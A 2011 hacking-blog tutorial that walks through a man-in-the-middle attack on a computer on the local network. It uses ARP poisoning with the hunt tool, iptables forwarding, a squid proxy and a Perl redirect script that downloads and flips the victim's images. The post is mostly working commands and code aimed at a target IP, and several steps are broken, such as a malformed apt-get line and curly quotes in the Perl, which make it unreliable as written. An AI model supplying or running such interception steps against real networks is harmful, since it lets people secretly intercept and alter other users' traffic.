Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Tuesday, March 22, 2011

How to hack the computer in your LAN?



This is what we want to do:
  • Make the target send all http packet to us instead of the gateway
  • Forward them to the real gateway
  • Modify the replay, with the pictures upside-down
  • Forward the replay to the target
This is how we’re going to do it:
  1. Poison the ARP table of the target
  2. Set up our pc as a gateway router
  3. Send all http requests through a squid proxy
  4. Turn images upside-down with a squid script

Ok, sound great, lets get started!


1. Poison the ARP table of the target
We want the target to send all packets to us instead of the real gateway. To do this we need to know a little about ip addresses and mac addresses. When we wan to send a packet to 10.0.0.1, there is sent out an ARP request on the local lan, saying “Which computer is at 10.0.0.1?”, then 10.0.0.1 answers with an ARP repay “I am at 10.0.0.1, with mac address 11:22:33:44:55:66″. 

Then we send the packet to 11:22:33:44:55:66. ARP replays are cached in a local ARP table, so the next time we want to send to 10.0.0.1, we don’t need to ask who’s got it. We are going to send a fake ARP replay to the target (10.0.0.88), saying we are at 10.0.0.1. Usually ARP replays are accepted even though no request was sent, so this is actually really easy.
How do I do this?
We can use arpoison to construct a fake packet and send it, but i prefer to use another a bit mor powerful script, called hunt. You can download the hunt source code here, and compile like this:

tar zxvf hunt-1.5.tgz
cd hunt-1.5
make

Fire up hunt:
sudo ./hunt
In the menu system go to
a) daemons rst/arp/sniff/mac
b) arp spoof + arp relayer daemon
c) insert single/range arp spoof
d) start/stop relayer daemon (press s)
Type in the ip of the real gateway, your mac address (find this by running ifconfig), and the targets ip. Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing “arp -a” on the target, and see that the gateway ip has your mac address.


2. Set up our pc as a gateway router
This is easy, just do this commands:

sudo iptables -F
sudo iptables -F -t nat
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Where eth0 is your network interface connected to the lan. The changes are reset the next time the network is reloaded.


3. Send all http requests through a squid proxy
Install squid and reset it’s config:

sudo apt-get squid
sudo mv /etc/squid/squid.conf /etc/squid/squid.conf.default
Edit /etc/squid/squid.conf with your favorite editor like this:
http_port 127.0.0.1:8080
http_port 10.0.0.2:8080

visible_hostname gateway.my.flat
cache_mgr proxy@foo.com

httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on

acl all src 0.0.0.0/0.0.0.0
http_access allow all
redirect_program /var/redirect

4. Turn images upside-down with a squid script
We use the redirect program defined in the squid config to flip our images, edit /var/redirect to look like this:


#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while (<>) {
chomp $_;
if ($_ =~ /(.*\.jpg)/i) {
$url = $1;
system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/$pid-$count.jpg”, “$url”);
system(”/usr/bin/mogrify”, “-flip”,”/var/www/$pid-$count.jpg”);
system(”/bin/chmod”, “777″, “/var/www/$pid-$count.jpg”);
print “http://127.0.0.1/$pid-$count.jpg\n”;
}
elsif ($_ =~ /(.*\.gif)/i) {
$url = $1;
system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/$pid-$count.gif”, “$url”);
system(”/usr/bin/mogrify”, “-flip”,”/var/www/$pid-$count.gif”);
system(”/bin/chmod”, “777″, “/var/www/$pid-$count.gif”);
print “http://127.0.0.1/$pid-$count.gif\n”;

}
else {
print “$_\n”;;
}
$count++;
}
As you can see from the script, we need to serve the flipped images from a local webserver. Therefore, install apache:
sudo apt-get install apache2
sudo chmod -R 777 /var/www
At last, reload squid with the new configuration:
sudo /etc/init.d/squid restart
You can test the squid by configuring your firefox to use localhost:8080 as a proxy server.

YOU HAVE NOW HACKED THE TARGET COMPUTER!

Thanks....
You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.
Thanks YAHOO OR GMAIL

0 comments:

Post a Comment

 
Back to Top